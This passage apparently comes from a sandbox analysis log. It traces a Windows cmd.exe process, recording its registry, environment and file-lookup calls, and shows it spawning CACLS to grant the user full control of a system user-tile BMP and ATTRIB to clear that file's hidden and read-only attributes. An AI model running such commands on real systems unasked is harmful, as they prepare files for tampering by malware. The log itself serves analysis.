lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e984, lpData=0x14e988, lpcbData=0x14e980*=0x1000 | out: lpType=0x14e984*=0x4, lpData=0x14e988*=0x9, lpcbData=0x14e980*=0x4) returned 0x0 [0190.840] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e984, lpData=0x14e988, lpcbData=0x14e980*=0x1000 | out: lpType=0x14e984*=0x4, lpData=0x14e988*=0x9, lpcbData=0x14e980*=0x4) returned 0x0 [0190.840] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e984, lpData=0x14e988, lpcbData=0x14e980*=0x1000 | out: lpType=0x14e984*=0x0, lpData=0x14e988*=0x9, lpcbData=0x14e980*=0x1000) returned 0x2 [0190.840] RegCloseKey (hKey=0x40) returned 0x0 [0190.840] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886399 [0190.840] srand (_Seed=0x5b886399) [0190.840] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\"" [0190.840] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\"" [0190.841] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0190.841] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x341a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0190.841] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0190.841] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0190.841] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0190.841] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0190.841] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0190.841] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0190.841] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0190.841] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0190.841] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0190.841] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0190.841] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0190.841] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0190.841] GetEnvironmentStringsW () returned 0x342458* [0190.842] FreeEnvironmentStringsW (penv=0x342458) returned 1 [0190.842] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.842] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0190.842] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0190.842] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0190.842] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0190.842] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0190.842] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0190.842] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0190.842] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0190.842] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0190.842] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f748 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0190.842] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14f748, lpFilePart=0x14f744 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f744*="Desktop") returned 0x18 [0190.842] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0190.842] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f4c4 | out: lpFindFileData=0x14f4c4) returned 0x340ae8 [0190.842] FindClose (in: hFindFile=0x340ae8 | out: hFindFile=0x340ae8) returned 1 [0190.842] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f4c4 | out: lpFindFileData=0x14f4c4) returned 0x340ae8 [0190.842] FindClose (in: hFindFile=0x340ae8 | out: hFindFile=0x340ae8) returned 1 [0190.842] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f4c4 | out: lpFindFileData=0x14f4c4) returned 0x340ae8 [0190.843] FindClose (in: hFindFile=0x340ae8 | out: hFindFile=0x340ae8) returned 1 [0190.843] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0190.843] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0190.843] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0190.843] GetEnvironmentStringsW () returned 0x340308* [0190.843] FreeEnvironmentStringsW (penv=0x340308) returned 1 [0190.843] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0190.843] GetConsoleOutputCP () returned 0x1b5 [0190.843] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0190.843] GetUserDefaultLCID () returned 0x409 [0190.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0190.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14f888, cchData=128 | out: lpLCData="0") returned 2 [0190.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14f888, cchData=128 | out: lpLCData="0") returned 2 [0190.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14f888, cchData=128 | out: lpLCData="1") returned 2 [0190.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0190.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0190.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0190.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0190.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0190.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0190.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0190.844] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0190.844] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0190.844] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0190.844] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0190.845] GetConsoleTitleW (in: lpConsoleTitle=0x3309b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.845] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0190.845] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0190.845] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0190.845] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0190.846] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0190.847] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0190.847] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0190.847] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0190.847] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0190.847] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0190.847] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0190.847] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0190.849] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0190.849] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0190.849] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0190.849] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0190.849] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0190.849] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0190.849] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0190.851] GetConsoleTitleW (in: lpConsoleTitle=0x14f51c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.852] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0190.852] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0190.852] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0190.852] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0190.852] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0190.852] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0190.852] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0190.852] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0190.852] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0190.852] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0190.852] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0190.852] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0190.852] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0190.852] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0190.852] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0190.852] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0190.852] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0190.852] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0190.852] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0190.852] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0190.852] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0190.852] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0190.852] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0190.852] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0190.852] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0190.852] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0190.852] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0190.852] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0190.852] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0190.852] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0190.852] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0190.852] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0190.852] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0190.852] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0190.852] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0190.852] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0190.852] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0190.852] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0190.852] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0190.852] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0190.852] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0190.852] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0190.852] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0190.853] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0190.853] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0190.853] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0190.853] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0190.853] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0190.853] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0190.853] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0190.853] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0190.853] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0190.853] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0190.853] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0190.853] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0190.853] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0190.853] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0190.853] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0190.853] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0190.853] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0190.853] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0190.853] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0190.853] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0190.853] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0190.853] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0190.853] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0190.853] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0190.853] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0190.853] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0190.853] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0190.853] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0190.853] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0190.853] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0190.853] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0190.853] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0190.853] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0190.853] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0190.853] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0190.853] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0190.853] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0190.853] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0190.853] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0190.853] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0190.853] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0190.853] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0190.853] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0190.853] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0190.854] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0190.854] SetErrorMode (uMode=0x0) returned 0x0 [0190.854] SetErrorMode (uMode=0x1) returned 0x0 [0190.854] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x341e98, lpFilePart=0x14f03c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f03c*="Desktop") returned 0x18 [0190.854] SetErrorMode (uMode=0x0) returned 0x1 [0190.854] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0190.854] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0190.859] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0190.919] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x14edb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14edb8) returned 0xffffffff [0190.920] GetLastError () returned 0x2 [0190.920] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x14edb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14edb8) returned 0xffffffff [0190.920] GetLastError () returned 0x2 [0190.920] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x14edb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14edb8) returned 0x342180 [0190.920] FindClose (in: hFindFile=0x342180 | out: hFindFile=0x342180) returned 1 [0190.920] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x14edb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14edb8) returned 0xffffffff [0190.920] GetLastError () returned 0x2 [0190.920] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x14edb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14edb8) returned 0x342180 [0190.921] FindClose (in: hFindFile=0x342180 | out: hFindFile=0x342180) returned 1 [0190.921] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0190.921] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0190.921] GetConsoleTitleW (in: lpConsoleTitle=0x14f2b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0190.921] InitializeProcThreadAttributeList (in: lpAttributeList=0x14f138, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x14f200 | out: lpAttributeList=0x14f138, lpSize=0x14f200) returned 1 [0190.921] UpdateProcThreadAttribute (in: lpAttributeList=0x14f138, dwFlags=0x0, Attribute=0x60001, lpValue=0x14f1f8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x14f138, lpPreviousValue=0x0) returned 1 [0190.921] GetStartupInfoW (in: lpStartupInfo=0x14f0f4 | out: lpStartupInfo=0x14f0f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0190.921] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0190.922] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x14f194*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14f1e0 | out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x14f1e0*(hProcess=0x50, hThread=0x4c, dwProcessId=0xab0, dwThreadId=0x858)) returned 1 [0190.924] CloseHandle (hObject=0x4c) returned 1 [0190.924] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0190.924] GetEnvironmentStringsW () returned 0x340308* [0190.924] FreeEnvironmentStringsW (penv=0x340308) returned 1 [0190.924] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0191.061] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x14f0d4 | out: lpExitCode=0x14f0d4*=0x0) returned 1 [0191.061] CloseHandle (hObject=0x50) returned 1 [0191.061] _vsnwprintf (in: _Buffer=0x14f21c, _BufferCount=0x13, _Format="%08X", _ArgList=0x14f0e0 | out: _Buffer="00000000") returned 8 [0191.061] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0191.061] GetEnvironmentStringsW () returned 0x342410* [0191.061] FreeEnvironmentStringsW (penv=0x342410) returned 1 [0191.061] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0191.061] GetEnvironmentStringsW () returned 0x342410* [0191.061] FreeEnvironmentStringsW (penv=0x342410) returned 1 [0191.061] DeleteProcThreadAttributeList (in: lpAttributeList=0x14f138 | out: lpAttributeList=0x14f138) [0191.061] GetConsoleTitleW (in: lpConsoleTitle=0x14f51c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0191.061] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0191.061] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0191.061] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0191.062] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x14edb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14edb8) returned 0xffffffff [0191.062] GetLastError () returned 0x2 [0191.062] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x14edb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14edb8) returned 0xffffffff [0191.062] GetLastError () returned 0x2 [0191.062] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x14edb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14edb8) returned 0x33e4d8 [0191.062] FindClose (in: hFindFile=0x33e4d8 | out: hFindFile=0x33e4d8) returned 1 [0191.062] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x14edb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14edb8) returned 0xffffffff [0191.062] GetLastError () returned 0x2 [0191.063] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x14edb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14edb8) returned 0x33e4d8 [0191.063] FindClose (in: hFindFile=0x33e4d8 | out: hFindFile=0x33e4d8) returned 1 [0191.063] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0191.063] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0191.063] GetConsoleTitleW (in: lpConsoleTitle=0x14f2b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0191.063] InitializeProcThreadAttributeList (in: lpAttributeList=0x14f138, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x14f200 | out: lpAttributeList=0x14f138, lpSize=0x14f200) returned 1 [0191.063] UpdateProcThreadAttribute (in: lpAttributeList=0x14f138, dwFlags=0x0, Attribute=0x60001, lpValue=0x14f1f8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x14f138, lpPreviousValue=0x0) returned 1 [0191.063] GetStartupInfoW (in: lpStartupInfo=0x14f0f4 | out: lpStartupInfo=0x14f0f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0191.063] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0191.063] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x14f194*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x14f1e0 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp\"", lpProcessInformation=0x14f1e0*(hProcess=0x4c, hThread=0x50, dwProcessId=0x98c, dwThreadId=0xb48)) returned 1 [0191.065] CloseHandle (hObject=0x50) returned 1 [0191.065] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0191.065] GetEnvironmentStringsW () returned 0x342410* [0191.065] FreeEnvironmentStringsW (penv=0x342410) returned 1 [0191.065] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0191.137] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x14f0d4 | out: lpExitCode=0x14f0d4*=0x0) returned 1 [0191.137] CloseHandle (hObject=0x4c) returned 1 [0191.137] _vsnwprintf (in: 